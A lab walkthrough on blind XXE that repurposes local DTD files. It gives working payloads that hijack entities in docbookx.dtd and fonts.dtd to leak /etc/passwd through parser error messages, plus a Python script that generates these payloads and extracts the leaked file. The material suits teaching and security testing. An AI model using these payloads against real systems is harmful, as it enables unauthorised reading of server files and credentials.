Exploiting XXE to retrieve data by repurposing a local DTD

Exploitation
The lab has a "check stock" feature that parses XML input.

Send the stock-check request to Burp Repeater.


The response never reflects any of the parsed values, so this is a blind XXE injection.
The usual out-of-band technique (a parameter entity that makes the parser fetch a DTD from a server we control) does not work either.
To exploit blind XXE with no channel back to us, we can repurpose a DTD that already exists on the target.
When to use a local DTD
The parser processes the entities we declare, but nothing it expands is reflected in the response, so there is no in-band exfiltration.
Egress filtering blocks out-of-band requests to a server we control.
A local DTD is a DTD file that already exists on the target's filesystem. We cannot edit it, but if it declares and then references a parameter entity, we can declare an entity of the same name before loading it: XML binds the first declaration it sees, so when the DTD references that entity it expands our text instead, and it does so in the context of an external DTD. That matters because the internal subset does not allow parameter entity references inside entity declarations, which the nested-entity trick depends on; an external DTD does allow them. Once our declarations run there, we make the parser load a URI that contains the target file's contents, and the resulting error message leaks them.
Enumerating DTD files
Referencing a DTD path that exists produces an error, while referencing a path that does not exist returns "No such file or directory".

The two responses differ, so we can tell existing DTD files from non-existent ones. Send the request to Intruder, mark the path in the SYSTEM identifier as the payload position, and run it against a list of common DTD locations, such as the one in GoSecure's dtd-finder repository.



The same repository provides a ready-made XXE payload for each DTD it lists. The docbookx.dtd payload redefines ISOamsa, a parameter entity that docbookx.dtd declares and then references:
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">
<!ENTITY % ISOamsa '
<!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
'>
%local_dtd;
]>
<message></message>

How it works: our ISOamsa declaration comes first, so when docbookx.dtd reaches its own %ISOamsa; reference it expands our text. Because that text sits inside a single-quoted entity literal in the internal subset, every % and ' that must only take effect once the DTD expands it is written as a character reference (&#x25; and &#x27;); the % in the innermost declaration passes through two literals, so it is double-escaped as &#x26;#x25;. When expanded, %eval; declares %error; with a SYSTEM identifier of file:///abcxyz/ followed by the contents of YOUR_FILE, and %error; makes the parser try to open that path. /abcxyz/ does not exist, so the error message echoes the full path, contents included. Replace YOUR_FILE with the file to read; the lab asks for /etc/passwd.

fonts.dtd can be repurposed the same way. It references the parameter entity constant in the middle of a declaration, so our replacement text first closes that declaration with aaa)>, then injects the same entities, and finally opens <!ELEMENT aa (bb so that the remainder of the DTD's original declaration still parses:
<!DOCTYPE message [
<!ENTITY % local_dtd SYSTEM "file:///usr/share/xml/fontconfig/fonts.dtd">
<!ENTITY % constant 'aaa)>
<!ENTITY &#x25; file SYSTEM "file:///YOUR_FILE">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///abcxyz/&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ELEMENT aa (bb'>
%local_dtd;
]>
<message></message>
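The following is an added example and not code from the original write-up or from the dtd-finder project: it builds the enumeration probe and the error-based exfiltration payload for both DTDs above, applying the character-reference escaping the internal subset requires, and recovers the leaked file from the parser's error message. The DTD paths and entity names are the ones used in the payloads above; the marker directory, the helper names and the sample error text (modelled on a Java FileNotFoundException) are assumptions constructed for illustration.

```python
"""Added example, not part of the original write-up: build the two payload
shapes used in the walkthrough (enumeration probe, error-based exfiltration
through a hijacked local DTD) and pull the leaked file back out of the
parser's error message.  The DTD paths and entity names come from the
payloads above; helper names, the marker directory and the sample error
text are assumptions constructed for illustration."""

import re
from typing import Optional

# The DTDs the write-up uses, the parameter entity each one references, and
# the text needed before/after our declarations so that the DTD still parses
# once our entity value is spliced in.  docbookx.dtd references %ISOamsa; on
# its own, so nothing extra is needed.  fonts.dtd references %constant; in
# the middle of a declaration, so we close that declaration first ("aaa)>")
# and open a new one at the end ("<!ELEMENT aa (bb") to absorb its tail.
LOCAL_DTDS = {
    "docbookx": {"path": "/usr/share/yelp/dtd/docbookx.dtd",
                 "entity": "ISOamsa", "before": "", "after": ""},
    "fonts":    {"path": "/usr/share/xml/fontconfig/fonts.dtd",
                 "entity": "constant", "before": "aaa)>",
                 "after": "<!ELEMENT aa (bb"},
}

# Directory that must not exist on the target: the parser's failure to open
# file:///abcxyz/<contents> is what echoes the contents back to us.
MARKER = "/abcxyz/"


def probe_payload(dtd_path: str) -> str:
    """Enumeration step: load a candidate DTD and nothing else.  Fed through
    Intruder with dtd_path as the payload position, present and absent files
    give different error text."""
    return ("<!DOCTYPE message [\n"
            f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
            "%local_dtd;\n"
            "]>\n"
            "<message></message>")


def exploit_payload(dtd: str, target_file: str) -> str:
    """Exfiltration step.  Our redefinition of the DTD's parameter entity
    lives in the internal subset, where a parameter entity reference inside
    an entity literal is not allowed, so every % and ' that must only take
    effect once the DTD expands our entity is written as a character
    reference: one level (&#x25;, &#x27;) for text in our literal, two
    levels (&#x26;#x25;) for the % that has to survive into the nested eval
    literal as well."""
    spec = LOCAL_DTDS[dtd]
    inner = "\n".join([
        f'<!ENTITY &#x25; file SYSTEM "file://{target_file}">',
        '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM '
        f"&#x27;file://{MARKER}&#x25;file;&#x27;>\">",
        "&#x25;eval;",
        "&#x25;error;",
    ])
    body = spec["before"] + "\n" + inner + "\n" + spec["after"]
    dtd_path, entity = spec["path"], spec["entity"]
    return ("<!DOCTYPE message [\n"
            f'<!ENTITY % local_dtd SYSTEM "file://{dtd_path}">\n'
            f"<!ENTITY % {entity} '{body}'>\n"
            "%local_dtd;\n"
            "]>\n"
            "<message></message>")


def leaked_content(error_text: str) -> Optional[str]:
    """Recover the file from an error that echoes the URI the parser could
    not open: everything after the marker, up to a closing quote, the
    "(No such file or directory)" tail, or the end of the message."""
    m = re.search(re.escape(MARKER) + r'(.*?)(?:"| \(No such file or directory\)|$)',
                  error_text, re.S)
    return m.group(1) if m else None


# Constructed sample of what the target might answer; not a real capture.
SAMPLE_ERROR = ("XML parser exited with error: java.io.FileNotFoundException: "
                "/abcxyz/root:x:0:0:root:/root:/bin/bash\n"
                "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin "
                "(No such file or directory)")

if __name__ == "__main__":
    print(exploit_payload("docbookx", "/etc/passwd"))
    print(leaked_content(SAMPLE_ERROR))
```

Paste the output of exploit_payload into the request body in Repeater; if the first DTD is not present on the target, switch the dictionary key to whichever DTD the Intruder run confirmed, and feed the error text from the response to leaked_content.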

Send the request with YOUR_FILE replaced by the target file; its contents come back inside the parser's error message, and the lab is solved.

I hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara